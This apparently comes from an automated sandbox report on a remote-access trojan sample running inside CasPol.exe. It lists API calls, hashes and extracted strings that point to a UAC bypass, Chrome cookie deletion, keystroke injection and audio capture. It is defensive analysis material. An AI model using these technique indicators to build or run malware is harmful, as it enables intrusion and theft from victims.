                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
                                                                                                                                                                          • String ID: h}v$tMG
                                                                                                                                                                          • API String ID: 1356121797-903662354
                                                                                                                                                                          • Opcode ID: 9b1047c9ca44e2a749ab23d5d752e689566d8b18fd1d1c15b9f7858ca427b8e5
                                                                                                                                                                          • Instruction ID: cbef553d477d36f78321a165484ecc4410fcecc505b8f9aca62d01b994c6c3e6
                                                                                                                                                                          • Opcode Fuzzy Hash: 9b1047c9ca44e2a749ab23d5d752e689566d8b18fd1d1c15b9f7858ca427b8e5
                                                                                                                                                                          • Instruction Fuzzy Hash: 8E2148716042019FC7299F6AEE09A697BAAFB84711B04403EE10DD76F1DBF848C5CB2C
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe$Rmc-N6HMP4$h}v$xtv
                                                                                                                                                                          • API String ID: 0-1346341271
                                                                                                                                                                          • Opcode ID: b018cd633a599e0a64cff488a6689e85db8eb881d1095507843e93d878d2a38f
                                                                                                                                                                          • Instruction ID: 8e81a4762a03630119b5543cf4782e43f3d691fcab72f30749e56a9243805afb
                                                                                                                                                                          • Opcode Fuzzy Hash: b018cd633a599e0a64cff488a6689e85db8eb881d1095507843e93d878d2a38f
                                                                                                                                                                          • Instruction Fuzzy Hash: 08F0F6B0A14141ABCB1067355D286AA3756A784397F00487BF547FB2F2EBBD5C82861E
                                                                                                                                                                          APIs
                                                                                                                                                                          • SendInput.USER32 ref: 00419A25
                                                                                                                                                                          • SendInput.USER32(00000001,?,0000001C), ref: 00419A4D
                                                                                                                                                                          • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419A74
                                                                                                                                                                          • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419A92
                                                                                                                                                                          • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419AB2
                                                                                                                                                                          • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419AD7
                                                                                                                                                                          • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419AF9
                                                                                                                                                                          • SendInput.USER32(00000001,00000000,0000001C), ref: 00419B1C
                                                                                                                                                                            • Part of subcall function 004199CE: MapVirtualKeyA.USER32 ref: 004199D4
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: InputSend$Virtual
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1167301434-0
                                                                                                                                                                          • Opcode ID: fc4380392ba50379eb6d472fb1d17d58296046c22f58e77cb3b57b5de18c14a3
                                                                                                                                                                          • Instruction ID: b6cba15de7ba168fc32b54cb564de1fb898aed6d56f2455a0f9f7e0387a20004
                                                                                                                                                                          • Opcode Fuzzy Hash: fc4380392ba50379eb6d472fb1d17d58296046c22f58e77cb3b57b5de18c14a3
                                                                                                                                                                          • Instruction Fuzzy Hash: 2431AE71218349A9E220DFA5DC41BDFBBECAF89B44F04080FF58457291CAA49D8C876B
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: __freea$__alloca_probe_16_free
                                                                                                                                                                          • String ID: a/p$am/pm$h{D
                                                                                                                                                                          • API String ID: 2936374016-2303565833
                                                                                                                                                                          • Opcode ID: fd6751c856b69d551333f65899c140b2c90fb7d01a30c867c2f4d7dd71cdc8bb
                                                                                                                                                                          • Instruction ID: c225e1f32c331ede1d29eb10815d0f52c76e58365e66366979e06629ded2ae5c
                                                                                                                                                                          • Opcode Fuzzy Hash: fd6751c856b69d551333f65899c140b2c90fb7d01a30c867c2f4d7dd71cdc8bb
                                                                                                                                                                          • Instruction Fuzzy Hash: 94D1E1719082068AFB299F68C845ABFB7B1EF05300F28455BE501AB351D73D9E43CBA9
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                                                                                                                                                          • _free.LIBCMT ref: 00444E87
                                                                                                                                                                          • _free.LIBCMT ref: 00444E9E
                                                                                                                                                                          • _free.LIBCMT ref: 00444EBD
                                                                                                                                                                          • _free.LIBCMT ref: 00444ED8
                                                                                                                                                                          • _free.LIBCMT ref: 00444EEF
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _free$AllocateHeap
                                                                                                                                                                          • String ID: KED
                                                                                                                                                                          • API String ID: 3033488037-2133951994
                                                                                                                                                                          • Opcode ID: bf8f09c86d4ddf62a61791e98d41f8d125843f3e4b01e4d539fef815b17f4b11
                                                                                                                                                                          • Instruction ID: 6eb5fd97c930506827bd935ec23fdf2bd7e2f8155051dcdfd38a61b70e77380a
                                                                                                                                                                          • Opcode Fuzzy Hash: bf8f09c86d4ddf62a61791e98d41f8d125843f3e4b01e4d539fef815b17f4b11
                                                                                                                                                                          • Instruction Fuzzy Hash: 2351B371A00604ABEB20DF29CC42B6B77F4FF89724B25456EE809D7751E739E901CB98
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetConsoleCP.KERNEL32 ref: 0044B47E
                                                                                                                                                                          • __fassign.LIBCMT ref: 0044B4F9
                                                                                                                                                                          • __fassign.LIBCMT ref: 0044B514
                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 0044B53A
                                                                                                                                                                          • WriteFile.KERNEL32(?,FF8BC35D,00000000,0044BBB1,00000000), ref: 0044B559
                                                                                                                                                                          • WriteFile.KERNEL32(?,?,00000001,0044BBB1,00000000), ref: 0044B592
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1324828854-0
                                                                                                                                                                          • Opcode ID: 311db8d3e4a1a0a231de64f74e89b34bd80b314b172ec9a4a2cdea1eea97895d
                                                                                                                                                                          • Instruction ID: 262f0c9efa3d8d05c94b564727faad167cb6e35c827a04fe4b8fb241bd644287
                                                                                                                                                                          • Opcode Fuzzy Hash: 311db8d3e4a1a0a231de64f74e89b34bd80b314b172ec9a4a2cdea1eea97895d
                                                                                                                                                                          • Instruction Fuzzy Hash: 2151B470A00249AFDB10CFA8D845AEEFBF8EF09304F14456BE955E7291E734D941CBA9
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetConsoleCP.KERNEL32 ref: 100094D4
                                                                                                                                                                          • __fassign.LIBCMT ref: 1000954F
                                                                                                                                                                          • __fassign.LIBCMT ref: 1000956A
                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 10009590
                                                                                                                                                                          • WriteFile.KERNEL32(?,?,00000000,10009C07,00000000), ref: 100095AF
                                                                                                                                                                          • WriteFile.KERNEL32(?,?,00000001,10009C07,00000000), ref: 100095E8
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.697379878.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.697370676.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.697379878.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_10000000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1324828854-0
                                                                                                                                                                          • Opcode ID: c8cde1f94c5a3c187481f919a86e285046f284bf183baf255f965bcae4dd5098
                                                                                                                                                                          • Instruction ID: 7b1e32e7ca62d622bc6abd4954a79b3a1191cf35157f5551c2bc05612337e78d
                                                                                                                                                                          • Opcode Fuzzy Hash: c8cde1f94c5a3c187481f919a86e285046f284bf183baf255f965bcae4dd5098
                                                                                                                                                                          • Instruction Fuzzy Hash: D7519271D00249AFEB10CFA4CC95BDEBBF8EF09350F15811AE955E7295D731AA41CB60
                                                                                                                                                                          APIs
                                                                                                                                                                          • __Init_thread_footer.LIBCMT ref: 004018BE
                                                                                                                                                                          • ExitThread.KERNEL32 ref: 004018F6
                                                                                                                                                                          • waveInUnprepareHeader.WINMM(?,00000020,00000000), ref: 00401A04
                                                                                                                                                                            • Part of subcall function 00434801: __onexit.LIBCMT ref: 00434807
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ExitHeaderInit_thread_footerThreadUnprepare__onexitwave
                                                                                                                                                                          • String ID: `kG$hMG$kG
                                                                                                                                                                          • API String ID: 1649129571-3851552405
                                                                                                                                                                          • Opcode ID: 1ce366054fa8339f5f00943ccf4ea62b73f095e265aa42ece7c8249153e98c3c
                                                                                                                                                                          • Instruction ID: dc699b77c08b599092ddf19de7d80486fcd8c0a7edd7622242773fc29a9484b7
                                                                                                                                                                          • Opcode Fuzzy Hash: 1ce366054fa8339f5f00943ccf4ea62b73f095e265aa42ece7c8249153e98c3c
                                                                                                                                                                          • Instruction Fuzzy Hash: 3441C2312042009BC324FB36DD96ABE73A6AB85354F00453FF54AA61F1DF38AD4AC61E
                                                                                                                                                                          APIs
                                                                                                                                                                          • _ValidateLocalCookies.LIBCMT ref: 1000339B
                                                                                                                                                                          • ___except_validate_context_record.LIBVCRUNTIME ref: 100033A3
                                                                                                                                                                          • _ValidateLocalCookies.LIBCMT ref: 10003431
                                                                                                                                                                          • __IsNonwritableInCurrentImage.LIBCMT ref: 1000345C
                                                                                                                                                                          • _ValidateLocalCookies.LIBCMT ref: 100034B1
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.697379878.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.697370676.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.697379878.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_10000000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                          • String ID: csm
                                                                                                                                                                          • API String ID: 1170836740-1018135373
                                                                                                                                                                          • Opcode ID: 314e045d64bd9dff90e147ebc0021a06731dbc25050b3dab86f6a1545ce1a07e
                                                                                                                                                                          • Instruction ID: 0a936c430148d26a69835db3fa9f683d01d5328c1142e13f0191aacd949c771e
                                                                                                                                                                          • Opcode Fuzzy Hash: 314e045d64bd9dff90e147ebc0021a06731dbc25050b3dab86f6a1545ce1a07e
                                                                                                                                                                          • Instruction Fuzzy Hash: D141D678E042189BEB12CF68C880A9FBBF9EF453A4F10C155E9159F25AD731FA01CB91
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00413656: RegOpenKeyExW.ADVAPI32 ref: 00413678
                                                                                                                                                                            • Part of subcall function 00413656: RegQueryValueExW.ADVAPI32(?,0040F34E,00000000,00000000,?,00000400), ref: 00413697
                                                                                                                                                                            • Part of subcall function 00413656: RegCloseKey.ADVAPI32(?), ref: 004136A0
                                                                                                                                                                            • Part of subcall function 0041C048: GetCurrentProcess.KERNEL32(?,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C059
                                                                                                                                                                            • Part of subcall function 0041C048: IsWow64Process.KERNEL32(00000000,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C060
                                                                                                                                                                          • _wcslen.LIBCMT ref: 0041B7F4
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Process$CloseCurrentOpenQueryValueWow64_wcslen
                                                                                                                                                                          • String ID: .exe$http\shell\open\command$h}v$program files (x86)\$program files\
                                                                                                                                                                          • API String ID: 3286818993-3387863453
                                                                                                                                                                          • Opcode ID: 426cf9f555deb71152b4ea0aff0bdf5362cc4b7c5296926717e194012261492b
                                                                                                                                                                          • Instruction ID: 00334f857bbe6022557327a28fa8f115e820bd32ca6b34e50ab8c41aa79dd428
                                                                                                                                                                          • Opcode Fuzzy Hash: 426cf9f555deb71152b4ea0aff0bdf5362cc4b7c5296926717e194012261492b
                                                                                                                                                                          • Instruction Fuzzy Hash: 42218872A001046BDB14BAB59CD6AFE766D9B48728F10043FF505B72C3EE3C9D49426D
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 4464324db8c5353dfe5ce51150f621231adbafcb5ed67c6bb2f14fac2072150c
                                                                                                                                                                          • Instruction ID: d4e598e7927038c57750db0ba161657e9615562456f8c919f0676739ef068bdb
                                                                                                                                                                          • Opcode Fuzzy Hash: 4464324db8c5353dfe5ce51150f621231adbafcb5ed67c6bb2f14fac2072150c
                                                                                                                                                                          • Instruction Fuzzy Hash: 931127B2504214BBEB216F768C05D1F7A5CEB86726B52062EFD55C7292DA3CCC0186A8
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00450CC1: _free.LIBCMT ref: 00450CEA
                                                                                                                                                                          • _free.LIBCMT ref: 00450FC8
                                                                                                                                                                            • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000), ref: 00446818
                                                                                                                                                                            • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                                                                                                                                          • _free.LIBCMT ref: 00450FD3
                                                                                                                                                                          • _free.LIBCMT ref: 00450FDE
                                                                                                                                                                          • _free.LIBCMT ref: 00451032
                                                                                                                                                                          • _free.LIBCMT ref: 0045103D
                                                                                                                                                                          • _free.LIBCMT ref: 00451048
                                                                                                                                                                          • _free.LIBCMT ref: 00451053
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 776569668-0
                                                                                                                                                                          • Opcode ID: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
                                                                                                                                                                          • Instruction ID: 345e916fd15b447c36d88a7a8914fd19e4c3e0710e9d23c2e9f19f8556552687
                                                                                                                                                                          • Opcode Fuzzy Hash: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
                                                                                                                                                                          • Instruction Fuzzy Hash: C111D231402704AAE621BB72CC03FCB779CAF03304F454D2EBEA967153C7ACB4185654
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 10009221: _free.LIBCMT ref: 1000924A
                                                                                                                                                                          • _free.LIBCMT ref: 100092AB
                                                                                                                                                                            • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000), ref: 10005734
                                                                                                                                                                            • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                                                                                                                                          • _free.LIBCMT ref: 100092B6
                                                                                                                                                                          • _free.LIBCMT ref: 100092C1
                                                                                                                                                                          • _free.LIBCMT ref: 10009315
                                                                                                                                                                          • _free.LIBCMT ref: 10009320
                                                                                                                                                                          • _free.LIBCMT ref: 1000932B
                                                                                                                                                                          • _free.LIBCMT ref: 10009336
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.697379878.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.697370676.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.697379878.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_10000000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 776569668-0
                                                                                                                                                                          • Opcode ID: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                                                                                                                                                                          • Instruction ID: 62dea9ede071ec04ae7e8d39c2d2a9b8d59ba4565e42afa4a1a73bd13a3591d1
                                                                                                                                                                          • Opcode Fuzzy Hash: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                                                                                                                                                                          • Instruction Fuzzy Hash: 3E118E35548B08FAFA20EBB0EC47FCB7B9DEF04780F400824BA9DB6097DA25B5249751
                                                                                                                                                                          APIs
                                                                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 004111AB
                                                                                                                                                                          • int.LIBCPMT ref: 004111BE
                                                                                                                                                                            • Part of subcall function 0040E0FC: std::_Lockit::_Lockit.LIBCPMT ref: 0040E10D
                                                                                                                                                                            • Part of subcall function 0040E0FC: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E127
                                                                                                                                                                          • std::_Facet_Register.LIBCPMT ref: 004111FE
                                                                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 00411207
                                                                                                                                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 00411225
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                                                                                                                                                          • String ID: 8mG
                                                                                                                                                                          • API String ID: 2536120697-3990007011
                                                                                                                                                                          • Opcode ID: 14799048d37b477e6c40f7e8d4f0e89b1ed2b05bcd10956721a24fc1261bb2b4
                                                                                                                                                                          • Instruction ID: 3a14b803bc510f5ed1108d30ac07207671fc4f07faef22c9ffd8c11cb1ae2def
                                                                                                                                                                          • Opcode Fuzzy Hash: 14799048d37b477e6c40f7e8d4f0e89b1ed2b05bcd10956721a24fc1261bb2b4
                                                                                                                                                                          • Instruction Fuzzy Hash: D3112332900124A7CB14EBAAD8018DEBBA99F44364F11456FFE04B72E1DB789E41CBD8
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetLastError.KERNEL32(?,?,0043A3D1,0043933E), ref: 0043A3E8
                                                                                                                                                                          • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0043A3F6
                                                                                                                                                                          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0043A40F
                                                                                                                                                                          • SetLastError.KERNEL32(00000000,?,0043A3D1,0043933E), ref: 0043A461
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3852720340-0
                                                                                                                                                                          • Opcode ID: 786e665d26cf754d1d2cf441f113ccf6d654ddd054b4af6544b9cbcea7eecff9
                                                                                                                                                                          • Instruction ID: 228fd8bb196f6ae1284969ba5442ea73dc67404c1df350b3d70410c0baad6fb0
                                                                                                                                                                          • Opcode Fuzzy Hash: 786e665d26cf754d1d2cf441f113ccf6d654ddd054b4af6544b9cbcea7eecff9
                                                                                                                                                                          • Instruction Fuzzy Hash: 87019C322483515EA61027797C8A62B2648EB293B9F30523FF518805F1EF984C90910D
                                                                                                                                                                          APIs
                                                                                                                                                                          • CoInitializeEx.OLE32(00000000,00000002), ref: 0040760B
                                                                                                                                                                            • Part of subcall function 00407538: _wcslen.LIBCMT ref: 0040755C
                                                                                                                                                                            • Part of subcall function 00407538: CoGetObject.OLE32(?,00000024,00466528,00000000), ref: 004075BD
                                                                                                                                                                          • CoUninitialize.OLE32 ref: 00407664
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: InitializeObjectUninitialize_wcslen
                                                                                                                                                                          • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe$[+] ShellExec success$[+] before ShellExec$[+] ucmCMLuaUtilShellExecMethod
                                                                                                                                                                          • API String ID: 3851391207-2637227304
                                                                                                                                                                          • Opcode ID: d877cea0863f9d3afa12868748af2f8600b5022738d517222c004e226c4c5a05
                                                                                                                                                                          • Instruction ID: e4e7d1672fbddd81374e29e92f863be8f9bad83f72bb7a306ddb251afa86686e
                                                                                                                                                                          • Opcode Fuzzy Hash: d877cea0863f9d3afa12868748af2f8600b5022738d517222c004e226c4c5a05
                                                                                                                                                                          • Instruction Fuzzy Hash: 4501D272B087116BE2246B65DC4AF6B3748DB41B25F11053FF901A62C1EAB9FC0146AB
                                                                                                                                                                          APIs
                                                                                                                                                                          • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 0040BB18
                                                                                                                                                                          • GetLastError.KERNEL32 ref: 0040BB22
                                                                                                                                                                          Strings
                                                                                                                                                                          • UserProfile, xrefs: 0040BAE8
                                                                                                                                                                          • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 0040BAE3
                                                                                                                                                                          • [Chrome Cookies found, cleared!], xrefs: 0040BB48
                                                                                                                                                                          • [Chrome Cookies not found], xrefs: 0040BB3C
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: DeleteErrorFileLast
